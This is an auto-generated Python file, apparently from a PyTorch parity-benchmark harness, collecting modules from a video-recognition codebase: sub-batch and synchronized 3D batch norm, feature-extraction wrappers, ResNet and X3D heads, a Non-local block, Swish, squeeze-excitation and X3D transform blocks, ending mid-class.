metrics = _module
misc = _module
multigrid = _module
multiprocessing = _module
parser = _module
weight_init_helper = _module
visualization = _module
tensorboard_vis = _module
utils = _module
run_net = _module
submit = _module
test_net = _module
train_net = _module
visualization = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
patch_functional()
open = mock_open()
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
_global_config = args = argv = cfg = config = params = _mock_config()
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range
wraps = functools.wraps
import math
import numpy as np
import random
import torch
import torchvision.io as io
import torch.utils.data
import itertools
from torch.utils.data._utils.collate import default_collate
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import RandomSampler
from torch.utils.data.sampler import Sampler
from itertools import chain as chain
import logging
import time
from collections import defaultdict
from functools import partial
import torch.distributed as dist
import torch.nn as nn
from torch.autograd.function import Function
import torch.nn.functional as F
from typing import Tuple
from typing import Optional
from typing import List
from collections import OrderedDict
from copy import deepcopy
from typing import Dict
from typing import Callable
import torch.utils.model_zoo as model_zoo
from torch import nn as nn
from torch import einsum
from torch.nn.modules.module import Module
from torch.nn.modules.activation import MultiheadAttention
from torch.nn import ReplicationPad3d
import copy
import warnings
from itertools import repeat
import functools
from collections import deque
from sklearn.metrics import average_precision_score
from matplotlib import pyplot as plt
from torch import nn
import logging as log
import matplotlib.pyplot as plt
from torch.utils.tensorboard import SummaryWriter
from torchvision.utils import make_grid
from sklearn.metrics import confusion_matrix
import scipy.io
class SubBatchNorm3d(nn.Module):
"""
The standard BN layer computes stats across all examples in a GPU. In some
cases it is desirable to compute stats across only a subset of examples
(e.g., in multigrid training https://arxiv.org/abs/1912.00998).
SubBatchNorm3d splits the batch dimension into N splits, and run BN on
each of them separately (so that the stats are computed on each subset of
examples (1/N of batch) independently. During evaluation, it aggregates
the stats from all splits into one BN.
"""
def __init__(self, num_splits, **args):
"""
Args:
num_splits (int): number of splits.
args (list): other arguments.
"""
super(SubBatchNorm3d, self).__init__()
self.num_splits = num_splits
num_features = args['num_features']
if args.get('affine', True):
self.affine = True
args['affine'] = False
self.weight = torch.nn.Parameter(torch.ones(num_features))
self.bias = torch.nn.Parameter(torch.zeros(num_features))
else:
self.affine = False
self.bn = nn.BatchNorm3d(**args)
args['num_features'] = num_features * num_splits
self.split_bn = nn.BatchNorm3d(**args)
def _get_aggregated_mean_std(self, means, stds, n):
"""
Calculate the aggregated mean and stds.
Args:
means (tensor): mean values.
stds (tensor): standard deviations.
n (int): number of sets of means and stds.
"""
mean = means.view(n, -1).sum(0) / n
std = stds.view(n, -1).sum(0) / n + ((means.view(n, -1) - mean) ** 2).view(n, -1).sum(0) / n
return mean.detach(), std.detach()
def aggregate_stats(self):
"""
Synchronize running_mean, and running_var. Call this before eval.
"""
if self.split_bn.track_running_stats:
self.bn.running_mean.data, self.bn.running_var.data = self._get_aggregated_mean_std(self.split_bn.running_mean, self.split_bn.running_var, self.num_splits)
def forward(self, x):
if self.training:
n, c, t, h, w = x.shape
x = x.view(n // self.num_splits, c * self.num_splits, t, h, w)
x = self.split_bn(x)
x = x.view(n, c, t, h, w)
else:
x = self.bn(x)
if self.affine:
x = x * self.weight.view((-1, 1, 1, 1))
x = x + self.bias.view((-1, 1, 1, 1))
return x
class GroupGather(Function):
"""
GroupGather performs all gather on each of the local process/ GPU groups.
"""
@staticmethod
def forward(ctx, input, num_sync_devices, num_groups):
"""
Perform forwarding, gathering the stats across different process/ GPU
group.
"""
ctx.num_sync_devices = num_sync_devices
ctx.num_groups = num_groups
input_list = [torch.zeros_like(input) for k in range(du.get_local_size())]
dist.all_gather(input_list, input, async_op=False, group=du._LOCAL_PROCESS_GROUP)
inputs = torch.stack(input_list, dim=0)
if num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // num_sync_devices
inputs = inputs[group_idx * num_sync_devices:(group_idx + 1) * num_sync_devices]
inputs = torch.sum(inputs, dim=0)
return inputs
@staticmethod
def backward(ctx, grad_output):
"""
Perform backwarding, gathering the gradients across different process/ GPU
group.
"""
grad_output_list = [torch.zeros_like(grad_output) for k in range(du.get_local_size())]
dist.all_gather(grad_output_list, grad_output, async_op=False, group=du._LOCAL_PROCESS_GROUP)
grads = torch.stack(grad_output_list, dim=0)
if ctx.num_groups > 1:
rank = du.get_local_rank()
group_idx = rank // ctx.num_sync_devices
grads = grads[group_idx * ctx.num_sync_devices:(group_idx + 1) * ctx.num_sync_devices]
grads = torch.sum(grads, dim=0)
return grads, None, None
class NaiveSyncBatchNorm3d(nn.BatchNorm3d):
def __init__(self, num_sync_devices, **args):
"""
Naive version of Synchronized 3D BatchNorm.
Args:
num_sync_devices (int): number of device to sync.
args (list): other arguments.
"""
self.num_sync_devices = num_sync_devices
if self.num_sync_devices > 0:
assert du.get_local_size() % self.num_sync_devices == 0, (du.get_local_size(), self.num_sync_devices)
self.num_groups = du.get_local_size() // self.num_sync_devices
else:
self.num_sync_devices = du.get_local_size()
self.num_groups = 1
super(NaiveSyncBatchNorm3d, self).__init__(**args)
def forward(self, input):
if du.get_local_size() == 1 or not self.training:
return super().forward(input)
assert input.shape[0] > 0, 'SyncBatchNorm does not support empty inputs'
C = input.shape[1]
mean = torch.mean(input, dim=[0, 2, 3, 4])
meansqr = torch.mean(input * input, dim=[0, 2, 3, 4])
vec = torch.cat([mean, meansqr], dim=0)
vec = GroupGather.apply(vec, self.num_sync_devices, self.num_groups) * (1.0 / self.num_sync_devices)
mean, meansqr = torch.split(vec, C)
var = meansqr - mean * mean
self.running_mean += self.momentum * (mean.detach() - self.running_mean)
self.running_var += self.momentum * (var.detach() - self.running_var)
invstd = torch.rsqrt(var + self.eps)
scale = self.weight * invstd
bias = self.bias - mean * scale
scale = scale.reshape(1, -1, 1, 1, 1)
bias = bias.reshape(1, -1, 1, 1, 1)
return input * scale + bias
def get_same_padding(x: int, k: int, s: int, d: int):
return max((int(math.ceil(x // s)) - 1) * s + (k - 1) * d + 1 - x, 0)
def pad_same(x, k, s, d=(1, 1), value=0):
ih, iw = x.size()[-2:]
pad_h, pad_w = get_same_padding(ih, k[0], s[0], d[0]), get_same_padding(iw, k[1], s[1], d[1])
if pad_h > 0 or pad_w > 0:
x = F.pad(x, [pad_w // 2, pad_w - pad_w // 2, pad_h // 2, pad_h - pad_h // 2], value=value)
return x
def conv2d_same(x, weight: torch.Tensor, bias: Optional[torch.Tensor]=None, stride: Tuple[int, int]=(1, 1), padding: Tuple[int, int]=(0, 0), dilation: Tuple[int, int]=(1, 1), groups: int=1):
x = pad_same(x, weight.shape[-2:], stride, dilation)
return F.conv2d(x, weight, bias, stride, (0, 0), dilation, groups)
class Conv2dSame(nn.Conv2d):
""" Tensorflow like 'SAME' convolution wrapper for 2D convolutions
"""
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True):
super(Conv2dSame, self).__init__(in_channels, out_channels, kernel_size, stride, 0, dilation, groups, bias)
def forward(self, x):
return conv2d_same(x, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
class FeatureInfo:
def __init__(self, feature_info: List[Dict], out_indices: Tuple[int]):
prev_reduction = 1
for fi in feature_info:
assert 'num_chs' in fi and fi['num_chs'] > 0
assert 'reduction' in fi and fi['reduction'] >= prev_reduction
prev_reduction = fi['reduction']
assert 'module' in fi
self.out_indices = out_indices
self.info = feature_info
def from_other(self, out_indices: Tuple[int]):
return FeatureInfo(deepcopy(self.info), out_indices)
def get(self, key, idx=None):
""" Get value by key at specified index (indices)
if idx == None, returns value for key at each output index
if idx is an integer, return value for that feature module index (ignoring output indices)
if idx is a list/tupple, return value for each module index (ignoring output indices)
"""
if idx is None:
return [self.info[i][key] for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [self.info[i][key] for i in idx]
else:
return self.info[idx][key]
def get_dicts(self, keys=None, idx=None):
""" return info dicts for specified keys (or all if None) at specified indices (or out_indices if None)
"""
if idx is None:
if keys is None:
return [self.info[i] for i in self.out_indices]
else:
return [{k: self.info[i][k] for k in keys} for i in self.out_indices]
if isinstance(idx, (tuple, list)):
return [(self.info[i] if keys is None else {k: self.info[i][k] for k in keys}) for i in idx]
else:
return self.info[idx] if keys is None else {k: self.info[idx][k] for k in keys}
def channels(self, idx=None):
""" feature channels accessor
"""
return self.get('num_chs', idx)
def reduction(self, idx=None):
""" feature reduction (output stride) accessor
"""
return self.get('reduction', idx)
def module_name(self, idx=None):
""" feature module name accessor
"""
return self.get('module', idx)
def __getitem__(self, item):
return self.info[item]
def __len__(self):
return len(self.info)
def _get_feature_info(net, out_indices):
feature_info = getattr(net, 'feature_info')
if isinstance(feature_info, FeatureInfo):
return feature_info.from_other(out_indices)
elif isinstance(feature_info, (list, tuple)):
return FeatureInfo(net.feature_info, out_indices)
else:
assert False, 'Provided feature_info is not valid'
def _get_return_layers(feature_info, out_map):
module_names = feature_info.module_name()
return_layers = {}
for i, name in enumerate(module_names):
return_layers[name] = out_map[i] if out_map is not None else feature_info.out_indices[i]
return return_layers
def _module_list(module, flatten_sequential=False):
ml = []
for name, module in module.named_children():
if flatten_sequential and isinstance(module, nn.Sequential):
for child_name, child_module in module.named_children():
combined = [name, child_name]
ml.append(('_'.join(combined), '.'.join(combined), child_module))
else:
ml.append((name, name, module))
return ml
class FeatureDictNet(nn.ModuleDict):
""" Feature extractor with OrderedDict return
Wrap a model and extract features as specified by the out indices, the network is
partially re-built from contained modules.
There is a strong assumption that the modules have been registered into the model in the same
order as they are used. There should be no reuse of the same nn.Module more than once, including
trivial modules like `self.relu = nn.ReLU`.
Only submodules that are directly assigned to the model class (`model.feature1`) or at most
one Sequential container deep (`model.features.1`, with flatten_sequent=True) can be captured.
All Sequential containers that are directly assigned to the original model will have their
modules assigned to this module with the name `model.features.1` being changed to `model.features_1`
Arguments:
model (nn.Module): model from which we will extract the features
out_indices (tuple[int]): model output indices to extract features for
out_map (sequence): list or tuple specifying desired return id for each out index,
otherwise str(index) is used
feature_concat (bool): whether to concatenate intermediate features that are lists or tuples
vs select element [0]
flatten_sequential (bool): whether to flatten sequential modules assigned to model
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
super(FeatureDictNet, self).__init__()
self.feature_info = _get_feature_info(model, out_indices)
self.concat = feature_concat
self.return_layers = {}
return_layers = _get_return_layers(self.feature_info, out_map)
modules = _module_list(model, flatten_sequential=flatten_sequential)
remaining = set(return_layers.keys())
layers = OrderedDict()
for new_name, old_name, module in modules:
layers[new_name] = module
if old_name in remaining:
self.return_layers[new_name] = str(return_layers[old_name])
remaining.remove(old_name)
if not remaining:
break
assert not remaining and len(self.return_layers) == len(return_layers), f'Return layers ({remaining}) are not present in model'
self.update(layers)
def _collect(self, x) ->Dict[str, torch.Tensor]:
out = OrderedDict()
for name, module in self.items():
x = module(x)
if name in self.return_layers:
out_id = self.return_layers[name]
if isinstance(x, (tuple, list)):
out[out_id] = torch.cat(x, 1) if self.concat else x[0]
else:
out[out_id] = x
return out
def forward(self, x) ->Dict[str, torch.Tensor]:
return self._collect(x)
class FeatureListNet(FeatureDictNet):
""" Feature extractor with list return
See docstring for FeatureDictNet above, this class exists only to appease Torchscript typing constraints.
In eager Python we could have returned List[Tensor] vs Dict[id, Tensor] based on a member bool.
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
super(FeatureListNet, self).__init__(model, out_indices=out_indices, out_map=out_map, feature_concat=feature_concat, flatten_sequential=flatten_sequential)
def forward(self, x) ->List[torch.Tensor]:
return list(self._collect(x).values())
class FeatureHooks:
""" Feature Hook Helper
This module helps with the setup and extraction of hooks for extracting features from
internal nodes in a model by node name. This works quite well in eager Python but needs
redesign for torcscript.
"""
def __init__(self, hooks, named_modules, out_map=None, default_hook_type='forward'):
modules = {k: v for k, v in named_modules}
for i, h in enumerate(hooks):
hook_name = h['module']
m = modules[hook_name]
hook_id = out_map[i] if out_map else hook_name
hook_fn = partial(self._collect_output_hook, hook_id)
hook_type = h['hook_type'] if 'hook_type' in h else default_hook_type
if hook_type == 'forward_pre':
m.register_forward_pre_hook(hook_fn)
elif hook_type == 'forward':
m.register_forward_hook(hook_fn)
else:
assert False, 'Unsupported hook type'
self._feature_outputs = defaultdict(OrderedDict)
def _collect_output_hook(self, hook_id, *args):
x = args[-1]
if isinstance(x, tuple):
x = x[0]
self._feature_outputs[x.device][hook_id] = x
def get_output(self, device) ->Dict[str, torch.tensor]:
output = self._feature_outputs[device]
self._feature_outputs[device] = OrderedDict()
return output
class FeatureHookNet(nn.ModuleDict):
""" FeatureHookNet
Wrap a model and extract features specified by the out indices using forward/forward-pre hooks.
If `no_rewrite` is True, features are extracted via hooks without modifying the underlying
network in any way.
If `no_rewrite` is False, the model will be re-written as in the
FeatureList/FeatureDict case by folding first to second (Sequential only) level modules into this one.
FIXME this does not currently work with Torchscript, see FeatureHooks class
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, out_as_dict=False, no_rewrite=False, feature_concat=False, flatten_sequential=False, default_hook_type='forward'):
super(FeatureHookNet, self).__init__()
assert not torch.jit.is_scripting()
self.feature_info = _get_feature_info(model, out_indices)
self.out_as_dict = out_as_dict
layers = OrderedDict()
hooks = []
if no_rewrite:
assert not flatten_sequential
if hasattr(model, 'reset_classifier'):
model.reset_classifier(0)
layers['body'] = model
hooks.extend(self.feature_info.get_dicts())
else:
modules = _module_list(model, flatten_sequential=flatten_sequential)
remaining = {f['module']: (f['hook_type'] if 'hook_type' in f else default_hook_type) for f in self.feature_info.get_dicts()}
for new_name, old_name, module in modules:
layers[new_name] = module
for fn, fm in module.named_modules(prefix=old_name):
if fn in remaining:
hooks.append(dict(module=fn, hook_type=remaining[fn]))
del remaining[fn]
if not remaining:
break
assert not remaining, f'Return layers ({remaining}) are not present in model'
self.update(layers)
self.hooks = FeatureHooks(hooks, model.named_modules(), out_map=out_map)
def forward(self, x):
for name, module in self.items():
x = module(x)
out = self.hooks.get_output(x.device)
return out if self.out_as_dict else list(out.values())
class ResNetBasicHead(nn.Module):
"""
ResNe(X)t 3D head.
This layer performs a fully-connected projection during training, when the
input size is 1x1x1. It performs a convolutional projection during testing
when the input size is larger than 1x1x1. If the inputs are from multiple
different pathways, the inputs will be concatenated after pooling.
"""
def __init__(self, dim_in, num_classes, pool_size, dropout_rate=0.0, act_func='softmax'):
"""
The `__init__` method of any subclass should also contain these
arguments.
ResNetBasicHead takes p pathways as input where p in [1, infty].
Args:
dim_in (list): the list of channel dimensions of the p inputs to the
ResNetHead.
num_classes (int): the channel dimensions of the p outputs to the
ResNetHead.
pool_size (list): the list of kernel sizes of p spatial temporal
poolings, temporal pool kernel size, spatial pool kernel size,
spatial pool kernel size in order.
dropout_rate (float): dropout rate. If equal to 0.0, perform no
dropout.
act_func (string): activation function to use. 'softmax': applies
softmax on the output. 'sigmoid': applies sigmoid on the output.
"""
super(ResNetBasicHead, self).__init__()
assert len({len(pool_size), len(dim_in)}) == 1, 'pathway dimensions are not consistent.'
self.num_pathways = len(pool_size)
for pathway in range(self.num_pathways):
if pool_size[pathway] is None:
avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
else:
avg_pool = nn.AvgPool3d(pool_size[pathway], stride=1)
self.add_module('pathway{}_avgpool'.format(pathway), avg_pool)
if dropout_rate > 0.0:
self.dropout = nn.Dropout(dropout_rate)
self.projection = nn.Linear(sum(dim_in), num_classes, bias=True)
if act_func == 'softmax':
self.act = nn.Softmax(dim=4)
elif act_func == 'sigmoid':
self.act = nn.Sigmoid()
else:
raise NotImplementedError('{} is not supported as an activationfunction.'.format(act_func))
def forward(self, inputs):
assert len(inputs) == self.num_pathways, 'Input tensor does not contain {} pathway'.format(self.num_pathways)
pool_out = []
for pathway in range(self.num_pathways):
m = getattr(self, 'pathway{}_avgpool'.format(pathway))
pool_out.append(m(inputs[pathway]))
x = torch.cat(pool_out, 1)
x = x.permute((0, 2, 3, 4, 1))
if hasattr(self, 'dropout'):
x = self.dropout(x)
x = self.projection(x)
if not self.training:
x = self.act(x)
x = x.mean([1, 2, 3])
x = x.view(x.shape[0], -1)
return x
class X3DHead(nn.Module):
"""
X3D head.
This layer performs a fully-connected projection during training, when the
input size is 1x1x1. It performs a convolutional projection during testing
when the input size is larger than 1x1x1. If the inputs are from multiple
different pathways, the inputs will be concatenated after pooling.
"""
def __init__(self, dim_in, dim_inner, dim_out, num_classes, pool_size, dropout_rate=0.0, act_func='softmax', inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, bn_lin5_on=False):
"""
The `__init__` method of any subclass should also contain these
arguments.
X3DHead takes a 5-dim feature tensor (BxCxTxHxW) as input.
Args:
dim_in (float): the channel dimension C of the input.
num_classes (int): the channel dimensions of the output.
pool_size (float): a single entry list of kernel size for
spatiotemporal pooling for the TxHxW dimensions.
dropout_rate (float): dropout rate. If equal to 0.0, perform no
dropout.
act_func (string): activation function to use. 'softmax': applies
softmax on the output. 'sigmoid': applies sigmoid on the output.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
bn_lin5_on (bool): if True, perform normalization on the features
before the classifier.
"""
super(X3DHead, self).__init__()
self.pool_size = pool_size
self.dropout_rate = dropout_rate
self.num_classes = num_classes
self.act_func = act_func
self.eps = eps
self.bn_mmt = bn_mmt
self.inplace_relu = inplace_relu
self.bn_lin5_on = bn_lin5_on
self._construct_head(dim_in, dim_inner, dim_out, norm_module)
def _construct_head(self, dim_in, dim_inner, dim_out, norm_module):
self.conv_5 = nn.Conv3d(dim_in, dim_inner, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
self.conv_5_bn = norm_module(num_features=dim_inner, eps=self.eps, momentum=self.bn_mmt)
self.conv_5_relu = nn.ReLU(self.inplace_relu)
if self.pool_size is None:
self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
else:
self.avg_pool = nn.AvgPool3d(self.pool_size, stride=1)
self.lin_5 = nn.Conv3d(dim_inner, dim_out, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
if self.bn_lin5_on:
self.lin_5_bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.lin_5_relu = nn.ReLU(self.inplace_relu)
if self.dropout_rate > 0.0:
self.dropout = nn.Dropout(self.dropout_rate)
self.projection = nn.Linear(dim_out, self.num_classes, bias=True)
if self.act_func == 'softmax':
self.act = nn.Softmax(dim=4)
elif self.act_func == 'sigmoid':
self.act = nn.Sigmoid()
else:
raise NotImplementedError('{} is not supported as an activationfunction.'.format(self.act_func))
def forward(self, inputs):
assert len(inputs) == 1, 'Input tensor does not contain 1 pathway'
x = self.conv_5(inputs[0])
x = self.conv_5_bn(x)
x = self.conv_5_relu(x)
x = self.avg_pool(x)
x = self.lin_5(x)
if self.bn_lin5_on:
x = self.lin_5_bn(x)
x = self.lin_5_relu(x)
x = x.permute((0, 2, 3, 4, 1))
if hasattr(self, 'dropout'):
x = self.dropout(x)
x = self.projection(x)
if not self.training:
x = self.act(x)
x = x.mean([1, 2, 3])
x = x.view(x.shape[0], -1)
return x
class Linear(nn.Linear):
def forward(self, input: torch.Tensor) ->torch.Tensor:
if torch.jit.is_scripting():
bias = self.bias if self.bias is not None else None
return F.linear(input, self.weight, bias=bias)
else:
return F.linear(input, self.weight, self.bias)
class Nonlocal(nn.Module):
"""
Builds Non-local Neural Networks as a generic family of building
blocks for capturing long-range dependencies. Non-local Network
computes the response at a position as a weighted sum of the
features at all positions. This building block can be plugged into
many computer vision architectures.
More details in the paper: https://arxiv.org/pdf/1711.07971.pdf
"""
def __init__(self, dim, dim_inner, pool_size=None, instantiation='softmax', zero_init_final_conv=False, zero_init_final_norm=True, norm_eps=1e-05, norm_momentum=0.1, norm_module=nn.BatchNorm3d):
"""
Args:
dim (int): number of dimension for the input.
dim_inner (int): number of dimension inside of the Non-local block.
pool_size (list): the kernel size of spatial temporal pooling,
temporal pool kernel size, spatial pool kernel size, spatial
pool kernel size in order. By default pool_size is None,
then there would be no pooling used.
instantiation (string): supports two different instantiation method:
"dot_product": normalizing correlation matrix with L2.
"softmax": normalizing correlation matrix with Softmax.
zero_init_final_conv (bool): If true, zero initializing the final
convolution of the Non-local block.
zero_init_final_norm (bool):
If true, zero initializing the final batch norm of the Non-local
block.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(Nonlocal, self).__init__()
self.dim = dim
self.dim_inner = dim_inner
self.pool_size = pool_size
self.instantiation = instantiation
self.use_pool = False if pool_size is None else any(size > 1 for size in pool_size)
self.norm_eps = norm_eps
self.norm_momentum = norm_momentum
self._construct_nonlocal(zero_init_final_conv, zero_init_final_norm, norm_module)
def _construct_nonlocal(self, zero_init_final_conv, zero_init_final_norm, norm_module):
self.conv_theta = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_phi = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_g = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_out = nn.Conv3d(self.dim_inner, self.dim, kernel_size=1, stride=1, padding=0)
self.conv_out.zero_init = zero_init_final_conv
self.bn = norm_module(num_features=self.dim, eps=self.norm_eps, momentum=self.norm_momentum)
self.bn.transform_final_bn = zero_init_final_norm
if self.use_pool:
self.pool = nn.MaxPool3d(kernel_size=self.pool_size, stride=self.pool_size, padding=[0, 0, 0])
def forward(self, x):
x_identity = x
N, C, T, H, W = x.size()
theta = self.conv_theta(x)
if self.use_pool:
x = self.pool(x)
phi = self.conv_phi(x)
g = self.conv_g(x)
theta = theta.view(N, self.dim_inner, -1)
phi = phi.view(N, self.dim_inner, -1)
g = g.view(N, self.dim_inner, -1)
theta_phi = torch.einsum('nct,ncp->ntp', (theta, phi))
if self.instantiation == 'softmax':
theta_phi = theta_phi * self.dim_inner ** -0.5
theta_phi = nn.functional.softmax(theta_phi, dim=2)
elif self.instantiation == 'dot_product':
spatial_temporal_dim = theta_phi.shape[2]
theta_phi = theta_phi / spatial_temporal_dim
else:
raise NotImplementedError('Unknown norm type {}'.format(self.instantiation))
theta_phi_g = torch.einsum('ntg,ncg->nct', (theta_phi, g))
theta_phi_g = theta_phi_g.view(N, self.dim_inner, T, H, W)
p = self.conv_out(theta_phi_g)
p = self.bn(p)
return x_identity + p
class SwishEfficient(torch.autograd.Function):
"""Swish activation function: x * sigmoid(x)."""
@staticmethod
def forward(ctx, x):
result = x * torch.sigmoid(x)
ctx.save_for_backward(x)
return result
@staticmethod
def backward(ctx, grad_output):
x = ctx.saved_variables[0]
sigmoid_x = torch.sigmoid(x)
return grad_output * (sigmoid_x * (1 + x * (1 - sigmoid_x)))
class Swish(nn.Module):
"""Swish activation function: x * sigmoid(x)."""
def __init__(self):
super(Swish, self).__init__()
def forward(self, x):
return SwishEfficient.apply(x)
class SE(nn.Module):
"""Squeeze-and-Excitation (SE) block w/ Swish: AvgPool, FC, Swish, FC, Sigmoid."""
def _round_width(self, width, multiplier, min_width=8, divisor=8):
"""
Round width of filters based on width multiplier
Args:
width (int): the channel dimensions of the input.
multiplier (float): the multiplication factor.
min_width (int): the minimum width after multiplication.
divisor (int): the new width should be dividable by divisor.
"""
if not multiplier:
return width
width *= multiplier
min_width = min_width or divisor
width_out = max(min_width, int(width + divisor / 2) // divisor * divisor)
if width_out < 0.9 * width:
width_out += divisor
return int(width_out)
def __init__(self, dim_in, ratio, relu_act=True):
"""
Args:
dim_in (int): the channel dimensions of the input.
ratio (float): the channel reduction ratio for squeeze.
relu_act (bool): whether to use ReLU activation instead
of Swish (default).
divisor (int): the new width should be dividable by divisor.
"""
super(SE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
dim_fc = self._round_width(dim_in, ratio)
self.fc1 = nn.Conv3d(dim_in, dim_fc, 1, bias=True)
self.fc1_act = nn.ReLU() if relu_act else Swish()
self.fc2 = nn.Conv3d(dim_fc, dim_in, 1, bias=True)
self.fc2_sig = nn.Sigmoid()
def forward(self, x):
x_in = x
for module in self.children():
x = module(x)
return x_in * x
class BasicTransform(nn.Module):
"""
Basic transformation: Tx3x3, 1x3x3, where T is the size of temporal kernel.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner=None, num_groups=1, stride_1x1=None, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the first
convolution in the basic block.
stride (int): the stride of the bottleneck.
dim_inner (None): the inner dimension would not be used in
BasicTransform.
num_groups (int): number of groups for the convolution. Number of
group is always 1 for BasicTransform.
stride_1x1 (None): stride_1x1 will not be used in BasicTransform.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(BasicTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._construct(dim_in, dim_out, stride, norm_module)
def _construct(self, dim_in, dim_out, stride, norm_module):
self.a = nn.Conv3d(dim_in, dim_out, kernel_size=[self.temp_kernel_size, 3, 3], stride=[1, stride, stride], padding=[int(self.temp_kernel_size // 2), 1, 1], bias=False)
self.a_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_out, dim_out, kernel_size=[1, 3, 3], stride=[1, 1, 1], padding=[0, 1, 1], bias=False)
self.b_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.b_bn.transform_final_bn = True
def forward(self, x):
x = self.a(x)
x = self.a_bn(x)
x = self.a_relu(x)
x = self.b(x)
x = self.b_bn(x)
return x
class X3DTransform(nn.Module):
"""
X3D transformation: 1x1x1, Tx3x3 (channelwise, num_groups=dim_in), 1x1x1,
augmented with (optional) SE (squeeze-excitation) on the 3x3x3 output.
T is the temporal kernel size (defaulting to 3)
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, se_ratio=0.0625, swish_inner=True, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the middle
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
se_ratio (float): if > 0, apply SE to the Tx3x3 conv, with the SE
channel dimensionality being se_ratio times the Tx3x3 conv dim.
swish_inner (bool): if True, apply swish to the Tx3x3 conv, otherwise
apply ReLU to the Tx3x3 conv.
"""
super(X3DTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._se_ratio = se_ratio
self._swish_inner = swish_inner
self._stride_1x1 = stride_1x1
self._block_idx = block_idx
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[1, 1, 1], stride=[1, str1x1, str1x1], padding=[0, 0, 0], bias=False)
self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_inner, dim_inner, [self.temp_kernel_size, 3, 3], stride=[1, str3x3, str3x3], padding=[int(self.temp_kernel_size // 2), dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
use_se = True if (self._block_idx + 1) % 2 else False
if self._se_ratio > 0.0 and use_se:
self.se = SE(dim_inner, self._se_ratio)
if self._swish_inner:
self.b_relu = Swish()
else:
self.b_relu = nn.ReLU(inplace=self._inplace_relu)
